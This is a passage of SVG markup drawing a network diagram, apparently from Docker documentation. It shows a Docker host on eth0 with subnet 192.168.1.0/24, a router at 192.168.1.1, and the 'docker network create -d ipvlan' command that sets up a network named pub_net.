font-weight="normal" text-decoration="" line-height="14px" x="90" y="26">3</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="97" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="100" y="26">24</text></g></g><g transform="matrix(1,0,0,1,104,130)"><g transform="translate(34,0) matrix(1,0,0,1,0,0) translate(-34,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(34,0) matrix(1,0,0,1,0,0) translate(-34,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(34,0) matrix(1,0,0,1,0,0) translate(-34,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="34" y="0" width="79" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="34" y="12">pub_net</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="78" y="12"> (</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="85" y="12">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="109" y="12">)</text></g></g><g transform="matrix(1,0,0,1,95,100)"><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g/></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="74" y="-7" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="74" y="-7" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(148,-14) matrix(1,0,0,1,0,0) translate(-148,14)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="1" height="14" fill-opacity="0"/></g></g></g><g transform="matrix(1,0,0,1,16,114)"><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="75" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="75" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="4" y="0" width="67" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="4" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="4" y="12">Docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="46" y="12">Host</text></g></g><g transform="matrix(1,0,0,1,81.616,49.859996948242184)"><g transform="translate(0,0)"><g transform="translate(-85,-50) translate(3.3840000000000003,0.1400030517578159) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#999999" d="M 88.116 56.359996948242184 L 160.558 56.359996948242184 Q 170.558 56.359996948242184 170.558 66.35999694824218 L 170.558 102 Q 170.558 112 169.779 112 L 169 112" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="matrix(1,0,0,1,73,236)"><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="193" height="56" fill-opacity="0"/></g></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="193" height="14" fill-opacity="0"/></g></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="174" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="12">docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="39" y="12">network</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="85" y="12">create</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="118" y="12"> -</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="125" y="12">d</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="135" y="12">ipvlan</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="167" y="12"> \</text></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="193" height="14" fill-opacity="0"/></g></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="152" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="13" y="26">--</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="21" y="26">subnet</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="26">=</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="64" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="84" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="88" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="108" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="111" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="118" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="121" y="26">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="128" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="131" y="26">24</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="144" y="26"> \</text></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="193" height="14" fill-opacity="0"/></g></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="28" width="144" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="13" y="40">--</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="21" y="40">gateway</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="40">=</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="73" y="40">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="93" y="40">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="96" y="40">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="116" y="40">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="120" y="40">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="126" y="40">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="130" y="40">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="136" y="40"> \</text></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="193" height="14" fill-opacity="0"/></g></g><g transform="translate(0,168) matrix(1,0,0,1,0,0) translate(0,-168)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="139" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="13" y="54">-</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="17" y="54">o</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="27" y="54">parent</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="61" y="54">=</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="68" y="54">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="95" y="54">pub_net</text></g></g><g transform="matrix(1,0,0,1,89,24)"><g transform="translate(0,0) matrix(1,0,0,1,0,0) translate(0,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="102" height="28" fill-opacity="0"/></g></g><g transform="translate(0,0) matrix(1,0,0,1,0,0) translate(0,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="102" height="28" fill-opacity="0"/></g></g><g transform="translate(0,0) matrix(1,0,0,1,0,0) translate(0,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="81" height="28" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="12">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="0" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="20" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="23" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="43" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="47" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="53" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="26">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="67" y="26">24</text></g></g><g transform="matrix(1,0,0,1,58.49998401988711,49.575)"><g transform="translate(0,0)"><g transform="translate(-147,-50) translate(88.50001598011289,0.42499999999999716) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#999999" d="M 64.99998401988711 56.075 L 241 56.075" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,241,36)"><g><g transform="translate(0,0) scale(0.6083333333333336,0.6104050109462419)"><g><g><path fill="#3966A0" stroke="rgb(0,0,0)" d="M 102.635 0 C 93.815 0 86.371 6.797 85.395 15.43 L 4.554 15.43 C 2.043 15.431 0 17.473 0 19.984 L 0 53.338 C 0 55.849 2.043 57.892 4.554 57.892 L 8.016 57.892 L 8.016 65.776 L 96.471 65.776 L 96.471 57.892 L 99.672 57.892 C 102.184 57.892 104.227 55.849 104.227 53.338 L 104.227 34.655 C 107.211 34.382 109.971 33.334 112.331 31.735 L 112.331 31.735 C 112.785 31.428 113.223 31.1 113.643 30.753 C 113.655 30.744 113.665 30.734 113.676 30.725 C 114.093 30.38 114.492 30.017 114.875 29.635 C 114.875 29.635 114.887 29.623 114.893 29.617 C 118.039 26.471 120 22.143 120 17.365 C 120 7.79 112.21 0 102.635 0 Z" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 102.688 3.191 C 94.836 3.191 88.45 9.579 88.45 17.43 C 88.45 25.281 94.838 31.669 102.688 31.669 C 110.54 31.669 116.926 25.281 116.926 17.43 C 116.926 9.579 110.539 3.191 102.688 3.191 Z M 97.377 20.901 C 97.118 20.901 96.859 20.802 96.662 20.605 C 96.267 20.21 96.267 19.569 96.662 19.174 L 97.412 18.424 L 91.228 18.424 C 90.669 18.424 90.216 17.971 90.216 17.412 C 90.216 16.853 90.67 16.4 91.229 16.4 L 97.414 16.4 L 96.699 15.686 C 96.303 15.291 96.303 14.65 96.699 14.255 C 97.095 13.86 97.735 13.86 98.13 14.255 L 100.571 16.696 C 100.665 16.79 100.739 16.902 100.791 17.026 C 100.894 17.273 100.894 17.552 100.791 17.799 C 100.739 17.924 100.665 18.036 100.571 18.129 L 98.093 20.605 C 97.895 20.802 97.637 20.901 97.377 20.901 Z M 105.863 25.522 L 103.422 27.963 C 103.225 28.161 102.965 28.259 102.707 28.259 C 102.698 28.259 102.689 28.254 102.68 28.254 C 102.671 28.254 102.663 28.259 102.655 28.259 C 102.305 28.259 102.012 28.07 101.83 27.801 L 99.515 25.484 C 99.119 25.089 99.119 24.448 99.515 24.053 C 99.91 23.658 100.55 23.658 100.945 24.053 L 101.644 24.752 L 101.644 9.174 L 100.945 9.873 C 100.748 10.071 100.488 10.169 100.23 10.169 C 99.97 10.169 99.711 10.07 99.515 9.873 C 99.119 9.478 99.119 8.837 99.515 8.442 L 101.954 6 C 102.35 5.605 102.988 5.605 103.385 6 L 105.864 8.478 C 106.26 8.873 106.26 9.514 105.864 9.909 C 105.667 10.107 105.408 10.205 105.149 10.205 C 104.889 10.205 104.63 10.106 104.434 9.909 L 103.667 9.143 L 103.667 24.857 L 104.434 24.091 C 104.829 23.696 105.468 23.696 105.864 24.091 C 106.258 24.486 106.258 25.126 105.863 25.522 Z M 114.148 18.46 L 107.964 18.46 L 108.677 19.174 C 109.073 19.569 109.073 20.21 108.677 20.605 C 108.48 20.803 108.22 20.901 107.961 20.901 C 107.702 20.901 107.442 20.802 107.246 20.605 L 104.808 18.165 C 104.713 18.072 104.64 17.959 104.587 17.835 C 104.485 17.588 104.485 17.309 104.587 17.062 C 104.64 16.937 104.713 16.825 104.808 16.732 L 107.284 14.255 C 107.68 13.86 108.32 13.86 108.715 14.255 C 109.11 14.65 109.11 15.291 108.715 15.686 L 107.964 16.437 L 114.149 16.437 C 114.708 16.437 115.161 16.89 115.161 17.449 C 115.16 18.008 114.707 18.46 114.148 18.46 Z" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 80.533 36.476 A 3.247 3.247 0 1 0 80.53299837650013 36.47924699945883 Z" opacity="0.5" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 9.278 35.006 L 20.39 35.006 L 20.39 24 L 9.278 24 L 9.278 35.006 Z M 10.929 25.567 L 18.819 25.567 L 18.819 31.173 L 16.536 31.173 L 16.536 33.456 L 13.213 33.456 L 13.213 31.173 L 10.93 31.173 L 10.929 25.567 L 10.929 25.567 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 24.253 35.015 L 35.365 35.015 L 35.365 24.009 L 24.253 24.009 L 24.253 35.015 Z M 25.904 25.576 L 33.794 25.576 L 33.794 31.182 L 31.51 31.182 L 31.51 33.465 L 28.187 33.465 L 28.187 31.182 L 25.904 31.182 L 25.904 25.576 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 50.3 24.009 L 39.188 24.009 L 39.188 35.014 L 50.3 35.014 L 50.3 24.009 Z M 48.729 31.173 L 46.446 31.173 L 46.446 33.456 L 43.123 33.456 L 43.123 31.173 L 40.84 31.173 L 40.84 25.567 L 48.73 25.567 L 48.729 31.173 L 48.729 31.173 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 54.123 35.023 L 65.234 35.023 L 65.234 24.018 L 54.123 24.018 L 54.123 35.023 Z M 55.774 25.567 L 63.664 25.567 L 63.664 31.173 L 61.38 31.173 L 61.38 33.456 L 58.057 33.456 L 58.057 31.173 L 55.774 31.173 L 55.774 25.567 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 9.278 49.95 L 20.39 49.95 L 20.39 38.944 L 9.278 38.944 L 9.278 49.95 Z M 10.929 40.502 L 18.819 40.502 L 18.819 46.108 L 16.536 46.108 L 16.536 48.391 L 13.213 48.391 L 13.213 46.108 L 10.93 46.108 L 10.929 40.502 L 10.929 40.502 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 24.253 49.958 L 35.365 49.958 L 35.365 38.953 L 24.253 38.953 L 24.253 49.958 Z M 25.904 40.52 L 33.794 40.52 L 33.794 46.126 L 31.51 46.126 L 31.51 48.408 L 28.187 48.408 L 28.187 46.126 L 25.904 46.126 L 25.904 40.52 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 39.228 49.966 L 50.34 49.966 L 50.34 38.962 L 39.228 38.962 L 39.228 49.966 Z M 40.839 40.511 L 48.729 40.511 L 48.729 46.117 L 46.446 46.117 L 46.446 48.4 L 43.123 48.4 L 43.123 46.117 L 40.84 46.117 L 40.839 40.511 L 40.839 40.511 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 54.123 49.966 L 65.234 49.966 L 65.234 38.962 L 54.123 38.962 L 54.123 49.966 Z M 55.774 40.511 L 63.664 40.511 L 63.664 46.117 L 61.38 46.117 L 61.38 48.4 L 58.057 48.4 L 58.057 46.117 L 55.774 46.117 L 55.774 40.511 Z" opacity="0.65" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 11.504 57.898 L 92.919 57.898 Q 92.919 57.898 92.919 57.898 L 92.919 62.69 Q 92.919 62.69 92.919 62.69 L 11.504 62.69 Q 11.504 62.69 11.504 62.69 L 11.504 57.898 Q 11.504 57.898 11.504 57.898 Z" opacity="0.7" stroke-opacity="0" stroke-miterlimit="10"/></g><g><path fill="#FFFFFF" stroke="rgb(0,0,0)" d="M 85.525 18.936 L 5.082 18.936 C 4.255 18.936 3.582 19.609 3.582 20.436 L 3.582 53.397 C 3.582 54.224 4.255 54.897 5.082 54.897 L 11.504 54.897 L 92.919 54.897 L 99.082 54.897 C 99.909 54.897 100.582 54.224 100.582 53.397 L 100.582 34.526 C 92.561 33.543 86.232 27.039 85.525 18.936 Z M 20.389 49.95 L 9.278 49.95 L 9.278 38.944 L 20.39 38.944 L 20.389 49.95 L 20.389 49.95 Z M 20.389 35.006 L 9.278 35.006 L 9.278 24 L 20.39 24 L 20.389 35.006 L 20.389 35.006 Z M 35.365 49.958 L 24.253 49.958 L 24.253 38.953 L 35.365 38.953 L 35.365 49.958 Z M 35.365 35.015 L 24.253 35.015 L 24.253 24.009 L 35.365 24.009 L 35.365 35.015 Z M 39.188 24.009 L 50.3 24.009 L 50.3 35.014 L 39.188 35.014 L 39.188 24.009 Z M 50.34 49.966 L 39.228 49.966 L 39.228 38.962 L 50.34 38.962 L 50.34 49.966 Z M 65.234 49.966 L 54.123 49.966 L 54.123 38.962 L 65.234 38.962 L 65.234 49.966 Z M 65.234 35.023 L 54.123 35.023 L 54.123 24.018 L 65.234 24.018 L 65.234 35.023 Z M 77.286 39.723 C 75.493 39.723 74.039 38.269 74.039 36.476 C 74.039 34.683 75.493 33.229 77.286 33.229 C 79.079 33.229 80.533 34.683 80.533 36.476 C 80.533 38.269 79.08 39.723 77.286 39.723 Z M 89.541 39.723 C 87.748 39.723 86.294 38.269 86.294 36.476 C 86.294 34.683 87.748 33.229 89.541 33.229 C 91.334 33.229 92.788 34.683 92.788 36.476 C 92.787 38.269 91.334 39.723 89.541 39.723 Z" opacity="0.93" stroke-opacity="0" stroke-miterlimit="10"/></g></g></g></g></g><g transform="matrix(1,0,0,1,222,79)"><g transform="translate(20,28) matrix(1,0,0,1,0,0) translate(-20,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="102" height="28" fill-opacity="0"/></g></g><g transform="translate(20,28) matrix(1,0,0,1,0,0) translate(-20,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="102" height="14" fill-opacity="0"/></g></g><g transform="translate(20,28) matrix(1,0,0,1,0,0) translate(-20,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="9" y="0" width="84" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="9" y="12">Network</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="12">Router</text></g><g transform="translate(20,28) matrix(1,0,0,1,0,0) translate(-20,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="102" height="14" fill-opacity="0"/></g></g><g transform="translate(20,28) matrix(1,0,0,1,0,0) translate(-20,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="14" width="82" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="11" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="31" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="34" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="54" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="58" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="64" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="68" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="74" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="78" y="26">24</text></g></g><g transform="translate(0,0) matrix(1,0,0,1,22.803646598905374,21.51999694824218)"><g><g transform="translate(0,0) scale(0.9127109745695561,0.9)"><g><g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 52.371 16.22 L -1.393 16.22 L -1.393 99.52 L 52.371 99.52" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 52.371 99.52 L 69.07 82.82 L 69.07 -0.48 L 19.98 -0.48 L -1.393 16.22 L 52.371 16.22 L 52.371 99.52 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="rgb(0,0,0)" stroke="#FFFFFF" d="M 52.371 16.22 L 69.07 -0.48" fill-opacity="0" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="rgb(0,0,0)" stroke="#FFFFFF" d="M 25.3 16.22 L 25.3 99.52" fill-opacity="0" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="rgb(0,0,0)" stroke="#FFFFFF" d="M 26.149 16.22 L 44.316 -0.48" fill-opacity="0" stroke-miterlimit="10" stroke-width="1.3594"/></g></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 3.263 23.823 L 21.317 23.823 Q 21.317 23.823 21.317 23.823 L 21.317 34.868 Q 21.317 34.868 21.317 34.868 L 3.263 34.868 Q 3.263 34.868 3.263 34.868 L 3.263 23.823 Q 3.263 23.823 3.263 23.823 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 29.156 23.823 L 47.207 23.823 Q 47.207 23.823 47.207 23.823 L 47.207 34.868 Q 47.207 34.868 47.207 34.868 L 29.156 34.868 Q 29.156 34.868 29.156 34.868 L 29.156 23.823 Q 29.156 23.823 29.156 23.823 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 3.263 64.604 L 21.317 64.604 Q 21.317 64.604 21.317 64.604 L 21.317 75.648 Q 21.317 75.648 21.317 75.648 L 3.263 75.648 Q 3.263 75.648 3.263 75.648 L 3.263 64.604 Q 3.263 64.604 3.263 64.604 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 29.156 64.604 L 47.207 64.604 Q 47.207 64.604 47.207 64.604 L 47.207 75.648 Q 47.207 75.648 47.207 75.648 L 29.156 75.648 Q 29.156 75.648 29.156 75.648 L 29.156 64.604 Q 29.156 64.604 29.156 64.604 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 3.263 82.445 L 21.317 82.445 Q 21.317 82.445 21.317 82.445 L 21.317 93.49 Q 21.317 93.49 21.317 93.49 L 3.263 93.49 Q 3.263 93.49 3.263 93.49 L 3.263 82.445 Q 3.263 82.445 3.263 82.445 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g><g><path fill="#3d85c6" stroke="#FFFFFF" d="M 29.156 82.445 L 47.207 82.445 Q 47.207 82.445 47.207 82.445 L 47.207 93.49 Q 47.207 93.49 47.207 93.49 L 29.156 93.49 Q 29.156 93.49 29.156 93.49 L 29.156 82.445 Q 29.156 82.445 29.156 82.445 Z" stroke-miterlimit="10" stroke-width="1.3594"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,27.38636363636374,108.14285409109937)"><g><g transform="translate(0,0) scale(3.742857142857143,2.8181818181818183)"><g><g><g><path fill="#929292" stroke="rgb(0,0,0)" d="M 58.97 19.094 